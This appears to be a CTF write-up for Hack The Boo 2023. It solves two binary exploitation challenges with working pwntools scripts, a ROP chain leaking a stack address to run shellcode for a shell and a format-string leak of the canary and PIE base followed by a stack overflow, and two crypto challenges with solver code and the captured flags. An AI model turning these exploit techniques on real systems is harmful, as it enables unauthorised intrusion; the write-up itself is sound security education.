Hack The Boo 2023 – Writeups
Some writeups for this year’s Hack The Boo competition. Thanks to the organizers at HTB for a great event!
- Pinata (pwn)
- Claw Machine (pwn)
- Symbols (crypto)
- Leakin Park (crypto)
Pinata
The first pwn
challenge was a statically compiled binary with very few security features enabled.
>>> from pwn import *
>>> exe = ELF('./pinata')
[*] '/.../hack-the-boo-2023/pwn/pinata/challenge/pinata'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX unknown - GNU_STACK missing
PIE: No PIE (0x400000)
Stack: Executable
RWX: Has RWX segments
It turns out that the “Canary found” was a false positive as well. The fact that the stack was executable seemed pretty juicy.
When running the code, we’re met with the following:
% nc 94.237.52.19 46643
██████████████████████████████████
█
█
█
█
█ ████
█ ██████
█ ██ ██
████████████████
███████████████▬
█████████████
██ ██ ██ ██
██ ██ ██ ██
Scream as much as you can to break the pinata!!
>>
Entering a long string caused a crash. Seems like a buffer overflow.
Decompiling in ghidra gives the following code for the reader
function:
int reader(UI *ui,UI_STRING *uis)
{
char *pcVar1;
char local_18 [16];
pcVar1 = gets(local_18);
return (int)pcVar1;
}
This reads an arbitrary-length string into a 16-byte buffer. There’s our overflow!
Since it was statically compiled and didn’t use the system
command, I wasn’t able to use a ROP chain to return into that function. However, given that the stack is executable, I could put my shellcode there and return into it. I just needed to leak the stack address.
One way to leak an address on the stack is to use the environ
variable. The first phase of the attack used the write
function (via a ROP chain) to leak the environ
variable and then return back into reader
for another round. OFFSET_RET
was defined as the offset from the start of the overflowed buffer to the return address on the stack (found using the debugger).
def main():
io = conn()
# ROP chain to call `write` with the `environ` address.
rop = ROP(exe)
rop.write(1, exe.symbols['environ'], 8)
io.recvuntil(b'>> ')
io.sendline(
b''.join([
b'A' * OFFSET_RET,
bytes(rop),
p64(exe.symbols['reader']),
])
)
Next, the value of environ
was read in to get a stack address, and again using the debugger, we can find the offset to the top of the stack on the next run of reader
.
environ_stack_addr = unpack(io.recv(numb=8))
top_of_stack = environ_stack_addr - OFFSET_ENVIRON_TOP_OF_STACK
log.info(f'Top of stack: {hex(top_of_stack)}')
Finally, we can return into an address on the stack. Since we only have 16 bytes before the return address, we have to calculate the offset from the top of the stack to the address immediately after the return address. That’s where we can put the shellcode, and that’s the address to return into.
io.sendline(
b''.join([
b'C' * OFFSET_RET,
p64(top_of_stack + 0x20),
asm(shellcraft.amd64.linux.sh())
])
)
And voila! We have a shell :)
% ./solve.py
[*] '/.../hack-the-boo-2023/pwn/pinata/challenge/pinata'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX unknown - GNU_STACK missing
PIE: No PIE (0x400000)
Stack: Executable
RWX: Has RWX segments
[+] Opening connection to 94.237.52.19 on port 46643: Done
[*] Loaded 124 cached gadgets for './pinata'
[*] Top of stack: 0x7ffeffec5e08
[*] Switching to interactive mode
$ cat flag.txt
HTB{5t4t1c4lly_l1nk3d_jmp_r4x_sc}
Claw Machine
This was another binary hacking challenge. However, this time the vulnerable function had a bit more to it.
The program was a “claw machine” game.
▛▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▜
▌▓▒▓▒▓▒▓▒▓▒▓▒▓▒▓▒▓▒▓▒▓▒▓▒▓▒▐
▌▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▐
█ | █
█ | █
█ | █
█ /▔▔ ▔▔ █
█ | | █
█ / █
█ █
█ █
█ __________ █
█ |flag.txt| █
████████████████████████████
Press '1' to move left, '2' to move right, '9' to grab the prize!
>>
Playing around a bit, it was quite hard to win.
▛▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▜
▌▓▒▓▒▓▒▓▒▓▒▓▒▓▒▓▒▓▒▓▒▓▒▓▒▓▒▐
▌▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▐
█ | █
█ | █
█ | █
█ | █
█ | █
█ | █
█ /▔▔ ▔▔ █
█ | | █
█ / ______ █
█ |flag.txt| █
████████████████████████████
[-] You broke the box and couldn't get the prize!
Would you like to rate our game? (y/n)
>>
However, after losing, it asked for some additional inputs, and I quickly found a format string vulnerability.
Would you like to rate our game? (y/n)
>> y
Enter your name: %p
Thank you for giving feedback 0x7ffd5c510230
Leave your feedback here: Good game
Thank you for playing!
Checking out the code in ghidra, I found the code in the fb
function that handles this:
void fb(void)
{
long in_FS_OFFSET;
char answer [2];
char name [16];
char feedback [64];
long canary;
canary = *(long *)(in_FS_OFFSET + 0x28);
answer[0] = ' ';
answer[1] = ' ';
name[0] = ' ';
...
name[15] = ' ';
feedback[0] = ' ';
...
feedback[63] = ' ';
printf("Would you like to rate our game? (y/n)nn>> ");
read(0,answer,2);
if ((answer[0] == 'y') || (answer[0] == 'Y')) {
printf("nEnter your name: ");
read(0,name,0x10);
printf("nThank you for giving feedback ");
printf(name);
printf("nLeave your feedback here: ");
read(0,feedback,0x5e);
}
puts("nThank you for playing!n");
if (canary != *(long *)(in_FS_OFFSET + 0x28)) {
/* WARNING: Subroutine does not return */
__stack_chk_fail();
}
return;
}
We can see above that there are actually two vulnerabilities: a format string vulnerability as discovered previously, printf(name)
, and a stack buffer overflow, since read(0,feedback,0x5e)
reads 94 bytes into a 64-byte buffer.
It’s worth noting that this binary has all of the safety features enabled:
>>> from pwn import *
>>> exe = ELF('./claw_machine')
[*] '/.../hack-the-boo-2023/pwn/claw_machine/challenge/claw_machine'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
RUNPATH: b'./glibc/'
However, it also happens to contain a very convenient read_flag
function:
void read_flag(void)
{
ssize_t sVar1;
long in_FS_OFFSET;
char local_15;
int local_14;
long local_10;
local_10 = *(long *)(in_FS_OFFSET + 0x28);
local_14 = open("./flag.txt",0);
if (local_14 < 0) {
perror("nError opening flag.txt, please contact an Administrator.n");
/* WARNING: Subroutine does not return */
exit(1);
}
while( true ) {
sVar1 = read(local_14,&local_15,1);
if (sVar1 < 1) break;
fputc((int)local_15,stdout);
}
close(local_14);
if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
/* WARNING: Subroutine does not return */
__stack_chk_fail();
}
return;
}
So the solution is to use the format string vulnerability to leak any data that we need, and then use the buffer overflow to return into read_flag
.
First of all, since the executable has PIE enabled (Position Independent Executable), we need to leak an address within the executable itself, so that we can get the address of read_flag
. The stack contains the return address of the fb
function which happens to be main+53
. So we can leak this address, and do some arithmetic to get the base address of the executable, and finally use that to get the address of read_flag
.
We also need to leak the stack canary so that when we overflow the buffer, we can write the stack canary in place so the return from the function still works.
Using the debugger to find the offsets, the code to do the above looks like this.
# Step 1: print return address (`main+53`) and canary.
io.recvuntil(b'Enter your name: ')
io.sendline(b'%23$p.%21$p')
# Get the values.
io.recvuntil(b'Thank you for giving feedback ')
values = io.recvline().split(b'.')
addr_main_53 = int(values[0], 16)
canary = int(values[1], 16)
log.info(f'Addr (main+53): {hex(addr_main_53)}')
log.info(f'Canary: {hex(canary)}')
# Set the offset of exe.
exe.address = addr_main_53 - (exe.symbols['main'] + 53)
addr_read_flag = exe.symbols["read_flag"]
log.info(f'Address of read_flag: {hex(addr_read_flag)}')
Then, after finding the offset from the start of the stack buffer to the canary (using <a href="https://docs.pwntools.com/en/stable/util/cyclic.html#pwnlib.util.cyclic.cyclic">cyclic</a>
and <a href="https://docs.pwntools.com/en/stable/util/cyclic.html#pwnlib.util.cyclic.cyclic_find">cyclic_find</a>
from pwntools
, along with the debugger), we can overflow the buffer, write the canary, write garbage into the saved rbp
, and overwrite the stack address:
# Step 2: return into `read_flag`, fixing the canary on the way.
io.sendline(b''.join([
b'A' * offset,
p64(canary),
b'B' * 8,
p64(addr_read_flag),
]))
And that’s it!
% ./solve.py
[*] '/.../hack-the-boo-2023/pwn/claw_machine/challenge/claw_machine'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
RUNPATH: b'./glibc/'
[+] Opening connection to 94.237.62.195 on port 34892: Done
[*] Addr (main+53): 0x5639e9a01552
[*] Canary: 0x8859e4851515dd00
[*] Address of read_flag: 0x5639e9a00b84
[*] Switching to interactive mode
Thank you for playing!
HTB{gr4b_th3_fl4g_w1th_fmt}
Symbols
The first crypto challenge came with a source.py
file showing how the flag was encrypted, and an output.txt
file with the encrypted output.
source.py
from secret import FLAG
from random import randint
p = 307163712384204009961137975465657319439
g = 1337
def encrypt(m):
bits = bin(m)[2:]
encrypted = []
for b in bits:
r = (randint(2, p) << 1) + int(b)
encrypted.append(pow(g, r, p))
return encrypted
def main():
flag = int.from_bytes(FLAG, 'big')
encrypted_flag = encrypt(flag)
with open('output.txt', 'w') as f:
f.write(str(encrypted_flag))
if __name__ == '__main__':
main()
output.txt
[236195756868517656723513582436861606906, 57834783484301373179714799552205481954, 267720308275932715147205375538382826955, ... ]
In pseudocode, the encrypt
function does the following:
- Break the message (which has been converted into an
int
) into its individual bits. - For each bit:
- Pick a random number between
1
andp - 1
(wherep
is a large prime number defined above). - Multiply that number by
2
(this is done using a bit shift operation:<< 1
). - Add the bit of the message. Store the result in
r
. - Compute
g ^ r mod p
(whereg == 1337
). Append the result in theencrypted
array.
- Pick a random number between
- The
encrypted
array contains our ciphertext output.
The trick here is to analyze the r
variable and realize that it is going to be an even number whenever the bit is 0
, and an odd number whenever the bit is 1
. This means that each item of our ciphertext takes the form c = 1337 ^ r mod p
and if we can determine whether r
is odd or even, then that tells us the value of the corresponding bit in the plaintext.
So how do we determine if r
is even or odd? Well, if r
is even, 1337 ^ r
is a perfect square, and c
is what’s know as a quadratic residue. It turns out there is an efficient algorithm for determining whether a number is a quadratic residue under a given modulus, and I grabbed some code to calculate it for me.
After messing with the code a little bit, I ran it against each of the numbers in output.txt
, put the bits back together, and got the flag!
solve.py
#!/usr/bin/env python3
from pwn import *
p = 307163712384204009961137975465657319439
g = 1337
# This is correct if it is only ever run on a prime number, which `p` is.
def factor(n):
return [(n, 1)]
def power_mod(base, exp, mod):
return pow(base, exp, mod)
def peel(a, p):
# Returns (k, b) such that a = p^k * b and b is minimal.
if a == 0: return (1, 0)
k = 0
while a % p == 0:
k += 1
a = a // p
return (k, a)
def is_quadratic_residue(a, n):
for (p, e) in factor(n):
(k, b) = peel(a % p**e, p)
if b == 0: continue
if k % 2: return False
if p == 2:
if e == 1: continue
if b % 4 != 1: return False
if e >= 3 and b % 8 != 1: return False
else: # Euler's criterion
if power_mod(b, (p - 1)//2, p) != 1:
return False
return True
def main():
with open('./output.txt', 'r') as f:
output = eval(f.read())
s = ''.join(map(lambda c: ('0' if is_quadratic_residue(c, p) else '1'), output))
i = int(s, 2)
flag = pack(i, endianness='big', word_size='all')
print(flag)
if __name__ == '__main__':
main()
Output:
% ./solve.py
b'HTB{l3g3ndr3_symb0l_1s_0v3rp0w3r3d}'
Leakin Park
This one was an RSA encryption which instead of providing the usual N
with the public key, it returned another number instead, which seemed to be calculated in a strange way.
source.py
from Crypto.Util.number import long_to_bytes, bytes_to_long, getPrime
from sympy import nextprime
import math
from secret import FLAG
FLAG = 'fakeflag'
MAX = 0x100
def factors():
return [getPrime(int(math.log2(MAX))) for i in range(int(math.log2(MAX)))]
class RSA:
def __init__(self):
p, q, self.leak = self.craft_primes()
self.n = p * q
self.e = 0x10001
def craft_primes(self):
numb = 1
count, p, q = 0, 0, 0
for i in factors():
count += 1
numb *= math.prod(range(1, i))
if count == 4:
p = nextprime(numb)
if count == 8:
q = nextprime(numb//p)
return p, q, numb
def encrypt(self, m):
return pow(m, self.e, self.n)
def main():
rsa = RSA()
ct = rsa.encrypt(bytes_to_long(FLAG))
with open('output.txt', 'w') as f:
f.write(f'{hex(rsa.leak)[2:]}n{hex(rsa.e)[2:]}n{hex(ct)[2:]}')
if __name__ == "__main__":
main()
Some analysis and testing uncovered the following:
- The
factors
function returned an array of size8
with random prime numbers less than256
. - The
craft_primes
function creates the RSA primesp
andq
along with this strange other numbernumb
as follows:- Iterate through the array returned by
factors
. - For each such number,
i
, calculatemath.prod(range(1, i))
. In mathematical terms, this computes(i - 1)!
(the factorial ofi - 1
). - Multiply this number by
numb
, sonumb
eventually becomes the product of all of these factorials. - After we’ve gotten through
4
elements of thefactors()
array, we computep = nextprime(numb)
which, as you may guess, gets the next prime number larger thannumb
. - After we’ve gotten through
8
elements, we computeq = nextprime(numb//p)
.
- Iterate through the array returned by
The encryption is then done using standard RSA, and we are given the resulting numb
.
It seems the goal is to figure out what p
and q
might be, which will allow us to reverse the RSA encryption. But how might we do that?
As a first step, I figured that we could work backwards from numb
to figure out the “factorial factors” that were used to create it. There are only ~40
primes that could be returned by factors()
, so we could more-or-less try all of them, compute the factorials, see if they are a factor of numb
, rinse and repeat. In the end I wrote a backtracking algorithm to find all of the factors.
from math import factorial, prod
from itertools import combinations
from sympy import nextprime
from time import time
...
primes = [2, 3, 5, 7, 11, 13, 17, 19, 23,
29, 31, 37, 41, 43, 47, 53, 59, 61, 67,
71, 73, 79, 83, 89, 97, 101, 103, 107,
109, 113, 127, 131, 137, 139, 149, 151,
157, 163, 167, 173, 179, 181, 191, 193,
197, 199, 211, 223, 227, 229, 233, 239,
241, 251]
possible_factorial_factors = list(map(lambda x: x-1, primes))
def find_factorial_factors(n):
if n <= 1:
return []
for p in reversed(possible_factorial_factors):
f = factorial(p)
if n % f != 0:
continue
additional_factorial_factors = find_factorial_factors(n // f)
if additional_factorial_factors != False:
return additional_factorial_factors + [p]
return False
The algorithm gave us the following factorial factors for numb
:
[130, 148, 148, 172, 178, 180, 240, 250]
But how do we use this to get p
and q
?
Well first of all, the above array gives us the output of the factor()
function which was used to compute numb
along with p
and q
(technically we would have to add 1
to each number to get the exact output of that function). Then we know that 4
of those numbers were used to compute factorials and multiply together before using nextprime
to get p
. Once we know p
, we can get q
easily since it was computed with q = nextprime(numb//p)
after all of the factors were used, meaning that we already know the value of numb
for that calculation, we only need p
.
But which 4
values were used to compute p
? Well, how many options could there be?
Turns out there are 50
unique possibilities for the values used to compute p
. There would have been 70
, except that two of the factors are the same (148
) which reduces our options.
So the next step was to use all 50
unique combinations of 4
values from the array, calculate the partial numb
from those factors, and compute a guess for p
and q
, leaving us with 50 guesses.
from math import factorial, prod
from itertools import combinations
from sympy import nextprime
from time import time
numb = ...
...
def guess_all_p_q(factorial_factors):
global numb
combs = set(combinations(factorial_factors, 4))
start_time = time()
i = 0
guesses = []
for comb in combs:
print(f'Guessing with combination: {comb}')
print(f'Time elapsed: {time() - start_time}')
print(f'Progress: {i} / {len(combs)}', flush=True)
i += 1
numb_partial = multiply_factorial_factors(comb)
p = nextprime(numb_partial)
q = nextprime(numb // p)
guesses.append({'p': p, 'q': q})
return guesses
Computing nextprime
was a bit slow, but in the end the script took a little under 15 minutes. Once we had all of the guesses for p
and q
, we could just iterate through them and decrypt the ciphertext until we found one that looked like the flag.
b'HTB{numb3rz_ar3_l3ak1ng_fr0m_3v3rywh3r3}'